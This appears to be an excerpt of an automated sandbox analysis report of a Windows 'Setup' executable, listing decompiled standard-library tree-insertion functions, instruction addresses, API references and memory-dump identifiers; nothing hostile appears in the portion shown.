                                                                                                                                                              0x004203a2
                                                                                                                                                              0x004203a4
                                                                                                                                                              0x00420346
                                                                                                                                                              0x00420351
                                                                                                                                                              0x0042035e
                                                                                                                                                              0x0042036b
                                                                                                                                                              0x0042036b
                                                                                                                                                              0x004203d6
                                                                                                                                                              0x004203d9
                                                                                                                                                              0x004203e8
                                                                                                                                                              0x004203ed
                                                                                                                                                              0x004203f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004203ff
                                                                                                                                                              0x00420423
                                                                                                                                                              0x00420428
                                                                                                                                                              0x0042042f
                                                                                                                                                              0x004205a3
                                                                                                                                                              0x004205aa
                                                                                                                                                              0x004205af
                                                                                                                                                              0x004205b5
                                                                                                                                                              0x004205b7
                                                                                                                                                              0x00420637
                                                                                                                                                              0x0042063c
                                                                                                                                                              0x00420642
                                                                                                                                                              0x00420644
                                                                                                                                                              0x0042064a
                                                                                                                                                              0x0042064f
                                                                                                                                                              0x00420654
                                                                                                                                                              0x0042065e
                                                                                                                                                              0x0042065e
                                                                                                                                                              0x0042067a
                                                                                                                                                              0x0042069f
                                                                                                                                                              0x004206b1
                                                                                                                                                              0x004206b6
                                                                                                                                                              0x004206bf
                                                                                                                                                              0x004205b9
                                                                                                                                                              0x004205d0
                                                                                                                                                              0x004205df
                                                                                                                                                              0x00420604
                                                                                                                                                              0x00420616
                                                                                                                                                              0x0042061b
                                                                                                                                                              0x00420620
                                                                                                                                                              0x00420620
                                                                                                                                                              0x00420435
                                                                                                                                                              0x00420459
                                                                                                                                                              0x00420460
                                                                                                                                                              0x00420465
                                                                                                                                                              0x0042046d
                                                                                                                                                              0x004204ed
                                                                                                                                                              0x004204f2
                                                                                                                                                              0x004204f8
                                                                                                                                                              0x004204fa
                                                                                                                                                              0x00420500
                                                                                                                                                              0x00420505
                                                                                                                                                              0x0042050a
                                                                                                                                                              0x00420514
                                                                                                                                                              0x00420514
                                                                                                                                                              0x00420530
                                                                                                                                                              0x00420555
                                                                                                                                                              0x00420567
                                                                                                                                                              0x0042056c
                                                                                                                                                              0x00420575
                                                                                                                                                              0x0042046f
                                                                                                                                                              0x00420486
                                                                                                                                                              0x00420495
                                                                                                                                                              0x004204ba
                                                                                                                                                              0x004204cc
                                                                                                                                                              0x004204d1
                                                                                                                                                              0x004204d6
                                                                                                                                                              0x004204d6
                                                                                                                                                              0x0042057a
                                                                                                                                                              0x004206c4
                                                                                                                                                              0x004206dc
                                                                                                                                                              0x004206e6
                                                                                                                                                              0x004206f1
                                                                                                                                                              0x004206fd

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004202F5
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420349
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420356
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00420363
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042038B
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0042039A
                                                                                                                                                                • Part of subcall function 004208B0: HandleT.LIBCPMTD ref: 00420944
                                                                                                                                                                • Part of subcall function 004208B0: HandleT.LIBCPMTD ref: 00420953
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004203BA
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004203C9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 004206CC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 004206E6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: ad2dffa54098eee553e5d828587db46679a889422e0d2e0b931740327440f885
                                                                                                                                                              • Instruction ID: 7913f4163ca43ad304d3f35ed371cff260fae5cd150668d2e043dfa50577e44d
                                                                                                                                                              • Opcode Fuzzy Hash: ad2dffa54098eee553e5d828587db46679a889422e0d2e0b931740327440f885
                                                                                                                                                              • Instruction Fuzzy Hash: FEE1A3F5E001549FDB04EFA1F882A6F73B6AF84308F54446DE8059B352D639E911CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00431A00 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 387memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00431A00(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				signed int _t94;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t107;
				intOrPtr* _t113;
				intOrPtr* _t117;
				char* _t122;
				intOrPtr* _t125;
				intOrPtr* _t134;
				intOrPtr* _t137;
				intOrPtr* _t149;
				char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t291;
				void* _t292;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t304;
				void* _t306;
				void* _t323;
				void* _t325;

				_push(0xffffffff);
				_push(0x517298);
				_push( *[fs:0x0]);
				_t293 = _t292 - 0x50;
				_t94 =  *0x561244; // 0xddd124f9
				_push(_t94 ^ _t291);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if(E00431E90(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E004134D0( &_v92, "map/set<T> too long");
					_v8 = 0;
					E00413D50( &_v92);
					E00456A4C( &_v64, 0x544b50);
					_v8 = 0xffffffff;
					E00413C20( &_v92);
				}
				_v20 = E00431F40( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t103 = E00441910(_a12);
						_t293 = _t293 + 4;
						 *_t103 = _v20;
						_t104 = E00433720(_v96);
						__eflags = _a12 -  *_t104;
						if(_a12 ==  *_t104) {
							 *((intOrPtr*)(E00433720(_v96))) = _v20;
						}
					} else {
						_t187 = E00415110(_a12);
						_t293 = _t293 + 4;
						 *_t187 = _v20;
						_t188 = E00433680(_v96);
						__eflags = _a12 -  *_t188;
						if(_a12 ==  *_t188) {
							 *((intOrPtr*)(E00433680(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
					 *((intOrPtr*)(E00433680(_v96))) = _v20;
					 *((intOrPtr*)(E00433720(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t107 = E00409110( *((intOrPtr*)(E0042AE30(_v24))));
					_t295 = _t293 + 8;
					if( *_t107 != 0) {
						break;
					}
					_t113 = E0042AE30(_v24);
					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
					_t300 = _t295 + 0x10;
					if( *_t113 !=  *_t117) {
						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t122 = E00409110(_a12);
						_t304 = _t300 + 0x10;
						__eflags =  *_t122;
						if( *_t122 != 0) {
							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
							_t306 = _t304 + 8;
							__eflags = _v24 -  *_t125;
							if(_v24 ==  *_t125) {
								_t137 = E0042AE30(_v24);
								_t306 = _t306 + 4;
								_v24 =  *_t137;
								E00409350(_v96, __eflags, _v24);
							}
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t306 + 0x1c;
							E004091A0(_v96, __eflags,  *_t134);
						} else {
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00409110(_a12))) = 1;
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t304 + 0x20;
							_v24 =  *_t149;
						}
					} else {
						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t156 = E00409110(_a12);
						_t323 = _t300 + 0x10;
						if( *_t156 != 0) {
							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
							_t325 = _t323 + 8;
							__eflags = _v24 -  *_t159;
							if(_v24 ==  *_t159) {
								_t171 = E0042AE30(_v24);
								_t325 = _t325 + 4;
								_v24 =  *_t171;
								E004091A0(_v96, __eflags, _v24);
							}
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t325 + 0x1c;
							E00409350(_v96, __eflags,  *_t168);
						} else {
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00409110(_a12))) = 1;
							 *((char*)(E00409110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t323 + 0x20;
							_v24 =  *_t184;
						}
					}
				}
				 *((char*)(E00409110( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
				E00445360(_a4, _v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}





































                                                                                                                                                              0x00431a03
                                                                                                                                                              0x00431a05
                                                                                                                                                              0x00431a10
                                                                                                                                                              0x00431a11
                                                                                                                                                              0x00431a15
                                                                                                                                                              0x00431a1c
                                                                                                                                                              0x00431a20
                                                                                                                                                              0x00431a26
                                                                                                                                                              0x00431a3a
                                                                                                                                                              0x00431a44
                                                                                                                                                              0x00431a49
                                                                                                                                                              0x00431a57
                                                                                                                                                              0x00431a65
                                                                                                                                                              0x00431a6a
                                                                                                                                                              0x00431a74
                                                                                                                                                              0x00431a74
                                                                                                                                                              0x00431a99
                                                                                                                                                              0x00431aa8
                                                                                                                                                              0x00431ab4
                                                                                                                                                              0x00431ae3
                                                                                                                                                              0x00431ae5
                                                                                                                                                              0x00431b1a
                                                                                                                                                              0x00431b1f
                                                                                                                                                              0x00431b25
                                                                                                                                                              0x00431b2a
                                                                                                                                                              0x00431b32
                                                                                                                                                              0x00431b34
                                                                                                                                                              0x00431b41
                                                                                                                                                              0x00431b41
                                                                                                                                                              0x00431ae7
                                                                                                                                                              0x00431aeb
                                                                                                                                                              0x00431af0
                                                                                                                                                              0x00431af6
                                                                                                                                                              0x00431afb
                                                                                                                                                              0x00431b03
                                                                                                                                                              0x00431b05
                                                                                                                                                              0x00431b12
                                                                                                                                                              0x00431b12
                                                                                                                                                              0x00431b14
                                                                                                                                                              0x00431ab6
                                                                                                                                                              0x00431ac1
                                                                                                                                                              0x00431ace
                                                                                                                                                              0x00431adb
                                                                                                                                                              0x00431adb
                                                                                                                                                              0x00431b46
                                                                                                                                                              0x00431b49
                                                                                                                                                              0x00431b58
                                                                                                                                                              0x00431b5d
                                                                                                                                                              0x00431b65
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00431b6f
                                                                                                                                                              0x00431b93
                                                                                                                                                              0x00431b98
                                                                                                                                                              0x00431b9f
                                                                                                                                                              0x00431d13
                                                                                                                                                              0x00431d1a
                                                                                                                                                              0x00431d1f
                                                                                                                                                              0x00431d25
                                                                                                                                                              0x00431d27
                                                                                                                                                              0x00431da7
                                                                                                                                                              0x00431dac
                                                                                                                                                              0x00431db2
                                                                                                                                                              0x00431db4
                                                                                                                                                              0x00431dba
                                                                                                                                                              0x00431dbf
                                                                                                                                                              0x00431dc4
                                                                                                                                                              0x00431dce
                                                                                                                                                              0x00431dce
                                                                                                                                                              0x00431dea
                                                                                                                                                              0x00431e0f
                                                                                                                                                              0x00431e21
                                                                                                                                                              0x00431e26
                                                                                                                                                              0x00431e2f
                                                                                                                                                              0x00431d29
                                                                                                                                                              0x00431d40
                                                                                                                                                              0x00431d4f
                                                                                                                                                              0x00431d74
                                                                                                                                                              0x00431d86
                                                                                                                                                              0x00431d8b
                                                                                                                                                              0x00431d90
                                                                                                                                                              0x00431d90
                                                                                                                                                              0x00431ba5
                                                                                                                                                              0x00431bc9
                                                                                                                                                              0x00431bd0
                                                                                                                                                              0x00431bd5
                                                                                                                                                              0x00431bdd
                                                                                                                                                              0x00431c5d
                                                                                                                                                              0x00431c62
                                                                                                                                                              0x00431c68
                                                                                                                                                              0x00431c6a
                                                                                                                                                              0x00431c70
                                                                                                                                                              0x00431c75
                                                                                                                                                              0x00431c7a
                                                                                                                                                              0x00431c84
                                                                                                                                                              0x00431c84
                                                                                                                                                              0x00431ca0
                                                                                                                                                              0x00431cc5
                                                                                                                                                              0x00431cd7
                                                                                                                                                              0x00431cdc
                                                                                                                                                              0x00431ce5
                                                                                                                                                              0x00431bdf
                                                                                                                                                              0x00431bf6
                                                                                                                                                              0x00431c05
                                                                                                                                                              0x00431c2a
                                                                                                                                                              0x00431c3c
                                                                                                                                                              0x00431c41
                                                                                                                                                              0x00431c46
                                                                                                                                                              0x00431c46
                                                                                                                                                              0x00431cea
                                                                                                                                                              0x00431e34
                                                                                                                                                              0x00431e4c
                                                                                                                                                              0x00431e56
                                                                                                                                                              0x00431e61
                                                                                                                                                              0x00431e6d

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00431A65
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AB9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AC6
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AD3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431AFB
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B0A
                                                                                                                                                                • Part of subcall function 00409350: HandleT.LIBCPMTD ref: 004093E4
                                                                                                                                                                • Part of subcall function 00409350: HandleT.LIBCPMTD ref: 004093F3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B2A
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431B39
                                                                                                                                                              • HandleT.LIBCPMTD ref: 00431E3C
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00431E56
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
                                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                                              • API String ID: 3699313741-1285458680
                                                                                                                                                              • Opcode ID: 5541c3eff9ac2d1f3906ca3eb5334e432a890d749b25990acfb3e491166c11ad
                                                                                                                                                              • Instruction ID: e4a790a359245b49f7060f943024f6769a204ec36205df451c937a2456567c87
                                                                                                                                                              • Opcode Fuzzy Hash: 5541c3eff9ac2d1f3906ca3eb5334e432a890d749b25990acfb3e491166c11ad
                                                                                                                                                              • Instruction Fuzzy Hash: 10E183F5E00144AFDB04EFA1E88296FB376AF89308F14446DE8055F356EA39ED11CB66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041CFA0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 387memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E0041CFA0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				signed int _t94;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t107;
				intOrPtr* _t113;
				intOrPtr* _t117;
				char* _t122;
				intOrPtr* _t125;
				intOrPtr* _t134;
				intOrPtr* _t137;
				intOrPtr* _t149;
				char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t291;
				void* _t292;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t304;
				void* _t306;
				void* _t323;
				void* _t325;

				_push(0xffffffff);
				_push(0x517298);
				_push( *[fs:0x0]);
				_t293 = _t292 - 0x50;
				_t94 =  *0x561244; // 0xddd124f9
				_push(_t94 ^ _t291);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if(E0041D730(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E004134D0( &_v92, "map/set<T> too long");
					_v8 = 0;
					E00413D50( &_v92);
					E00456A4C( &_v64, 0x544b50);
					_v8 = 0xffffffff;
					E00413C20( &_v92);
				}
				_v20 = E0041DB60( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t103 = E00441910(_a12);
						_t293 = _t293 + 4;
						 *_t103 = _v20;
						_t104 = E00433720(_v96);
						__eflags = _a12 -  *_t104;
						if(_a12 ==  *_t104) {
							 *((intOrPtr*)(E00433720(_v96))) = _v20;
						}
					} else {
						_t187 = E00415110(_a12);
						_t293 = _t293 + 4;
						 *_t187 = _v20;
						_t188 = E00433680(_v96);
						__eflags = _a12 -  *_t188;
						if(_a12 ==  *_t188) {
							 *((intOrPtr*)(E00433680(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
					 *((intOrPtr*)(E00433680(_v96))) = _v20;
					 *((intOrPtr*)(E00433720(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t107 = E0041D720( *((intOrPtr*)(E0042AE30(_v24))));
					_t295 = _t293 + 8;
					if( *_t107 != 0) {
						break;
					}
					_t113 = E0042AE30(_v24);
					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
					_t300 = _t295 + 0x10;
					if( *_t113 !=  *_t117) {
						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t122 = E0041D720(_a12);
						_t304 = _t300 + 0x10;
						__eflags =  *_t122;
						if( *_t122 != 0) {
							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
							_t306 = _t304 + 8;
							__eflags = _v24 -  *_t125;
							if(_v24 ==  *_t125) {
								_t137 = E0042AE30(_v24);
								_t306 = _t306 + 4;
								_v24 =  *_t137;
								E0041DA30(_v96, __eflags, _v24);
							}
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t306 + 0x1c;
							E0041D900(_v96, __eflags,  *_t134);
						} else {
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0041D720(_a12))) = 1;
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t304 + 0x20;
							_v24 =  *_t149;
						}
					} else {
						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t156 = E0041D720(_a12);
						_t323 = _t300 + 0x10;
						if( *_t156 != 0) {
							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
							_t325 = _t323 + 8;
							__eflags = _v24 -  *_t159;
							if(_v24 ==  *_t159) {
								_t171 = E0042AE30(_v24);
								_t325 = _t325 + 4;
								_v24 =  *_t171;
								E0041D900(_v96, __eflags, _v24);
							}
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t325 + 0x1c;
							E0041DA30(_v96, __eflags,  *_t168);
						} else {
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E0041D720(_a12))) = 1;
							 *((char*)(E0041D720( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t323 + 0x20;
							_v24 =  *_t184;
						}
					}
				}
				 *((char*)(E0041D720( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
				E00445360(_a4, _v20);
				 *[fs:0x0] = _v16;
				return _a4;
			}





































                                                                                                                                                              0x0041cfa3
                                                                                                                                                              0x0041cfa5
                                                                                                                                                              0x0041cfb0
                                                                                                                                                              0x0041cfb1
                                                                                                                                                              0x0041cfb5
                                                                                                                                                              0x0041cfbc
                                                                                                                                                              0x0041cfc0
                                                                                                                                                              0x0041cfc6
                                                                                                                                                              0x0041cfda
                                                                                                                                                              0x0041cfe4
                                                                                                                                                              0x0041cfe9
                                                                                                                                                              0x0041cff7
                                                                                                                                                              0x0041d005
                                                                                                                                                              0x0041d00a
                                                                                                                                                              0x0041d014
                                                                                                                                                              0x0041d014
                                                                                                                                                              0x0041d039
                                                                                                                                                              0x0041d048
                                                                                                                                                              0x0041d054
                                                                                                                                                              0x0041d083
                                                                                                                                                              0x0041d085
                                                                                                                                                              0x0041d0ba
                                                                                                                                                              0x0041d0bf
                                                                                                                                                              0x0041d0c5
                                                                                                                                                              0x0041d0ca
                                                                                                                                                              0x0041d0d2
                                                                                                                                                              0x0041d0d4
                                                                                                                                                              0x0041d0e1
                                                                                                                                                              0x0041d0e1
                                                                                                                                                              0x0041d087
                                                                                                                                                              0x0041d08b
                                                                                                                                                              0x0041d090
                                                                                                                                                              0x0041d096
                                                                                                                                                              0x0041d09b
                                                                                                                                                              0x0041d0a3
                                                                                                                                                              0x0041d0a5
                                                                                                                                                              0x0041d0b2
                                                                                                                                                              0x0041d0b2
                                                                                                                                                              0x0041d0b4
                                                                                                                                                              0x0041d056
                                                                                                                                                              0x0041d061
                                                                                                                                                              0x0041d06e
                                                                                                                                                              0x0041d07b
                                                                                                                                                              0x0041d07b
                                                                                                                                                              0x0041d0e6
                                                                                                                                                              0x0041d0e9
                                                                                                                                                              0x0041d0f8
                                                                                                                                                              0x0041d0fd
                                                                                                                                                              0x0041d105
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041d10f
                                                                                                                                                              0x0041d133
                                                                                                                                                              0x0041d138
                                                                                                                                                              0x0041d13f
                                                                                                                                                              0x0041d2b3
                                                                                                                                                              0x0041d2ba
                                                                                                                                                              0x0041d2bf
                                                                                                                                                              0x0041d2c5
                                                                                                                                                              0x0041d2c7
                                                                                                                                                              0x0041d347
                                                                                                                                                              0x0041d34c
                                                                                                                                                              0x0041d352
                                                                                                                                                              0x0041d354
                                                                                                                                                              0x0041d35a
                                                                                                                                                              0x0041d35f
                                                                                                                                                              0x0041d364
                                                                                                                                                              0x0041d36e
                                                                                                                                                              0x0041d36e
                                                                                                                                                              0x0041d38a
                                                                                                                                                              0x0041d3af
                                                                                                                                                              0x0041d3c1
                                                                                                                                                              0x0041d3c6
                                                                                                                                                              0x0041d3cf
                                                                                                                                                              0x0041d2c9
                                                                                                                                                              0x0041d2e0
                                                                                                                                                              0x0041d2ef
                                                                                                                                                              0x0041d314
                                                                                                                                                              0x0041d326
                                                                                                                                                              0x0041d32b
                                                                                                                                                              0x0041d330
                                                                                                                                                              0x0041d330
                                                                                                                                                              0x0041d145
                                                                                                                                                              0x0041d169
                                                                                                                                                              0x0041d170
                                                                                                                                                              0x0041d175
                                                                                                                                                              0x0041d17d
                                                                                                                                                              0x0041d1fd
                                                                                                                                                              0x0041d202
                                                                                                                                                              0x0041d208
                                                                                                                                                              0x0041d20a
                                                                                                                                                              0x0041d210
                                                                                                                                                              0x0041d215
                                                                                                                                                              0x0041d21a
                                                                                                                                                              0x0041d224
                                                                                                                                                              0x0041d224
                                                                                                                                                              0x0041d240
                                                                                                                                                              0x0041d265
                                                                                                                                                              0x0041d277
                                                                                                                                                              0x0041d27c
                                                                                                                                                              0x0041d285
                                                                                                                                                              0x0041d17f
                                                                                                                                                              0x0041d196
                                                                                                                                                              0x0041d1a5
                                                                                                                                                              0x0041d1ca
                                                                                                                                                              0x0041d1dc
                                                                                                                                                              0x0041d1e1
                                                                                                                                                              0x0041d1e6
                                                                                                                                                              0x0041d1e6
                                                                                                                                                              0x0041d28a
                                                                                                                                                              0x0041d3d4
                                                                                                                                                              0x0041d3ec
                                                                                                                                                              0x0041d3f6
                                                                                                                                                              0x0041d401
                                                                                                                                                              0x0041d40d

                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041D005
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D059
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D066
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D073
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D09B
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0AA
                                                                                                                                                                • Part of subcall function 0041DA30: HandleT.LIBCPMTD ref: 0041DAC4
                                                                                                                                                                • Part of subcall function 0041DA30: HandleT.LIBCPMTD ref: 0041DAD3
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0CA
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D0D9
                                                                                                                                                              • HandleT.LIBCPMTD ref: 0041D3DC
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 0041D3F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
